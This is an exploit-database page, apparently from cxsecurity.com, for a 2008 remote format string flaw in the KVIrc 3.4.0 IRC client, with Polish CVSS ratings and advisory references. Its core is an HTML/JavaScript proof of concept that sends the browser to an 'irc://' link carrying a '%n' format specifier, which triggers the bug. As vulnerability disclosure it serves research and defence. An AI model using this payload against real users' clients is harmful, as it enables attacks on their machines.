KVIrc 3.4.0 Virgo Remote Format String Exploit PoC

2008.10.29
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


Ogólna skala CVSS: 7.6/10
Znaczenie: 10/10
Łatwość wykorzystania: 4.9/10
Wymagany dostęp: Zdalny
Złożoność ataku: Wysoka
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

<!-- KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC) Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit. KVirc is being written by Szymon Stefanek and the KVIrc Development Team with the contribution of many IRC addicted developers around the world. Product web page: http://www.kvirc.net/ Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm [t00t] gmail [d0t] com http://www.zeroscience.org 24.10.2008 --> <html> <title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title> <head> <body> <center> <br /> <br /> <strong>Warning ! :)</strong> </center> <body bgcolor="#FFFF00"> <script type="text/javascript"> alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008"); function poc() { window.location.href = "irc://A:%n -i"; } var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation"); if (answ == true) { poc(); } else { window.location.href = "http://www.kvirc.net"; } </script> </body> </head> </html>

Referencje:

http://www.securityfocus.com/bid/31912
http://www.milw0rm.com/exploits/6832
http://secunia.com/advisories/32410


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top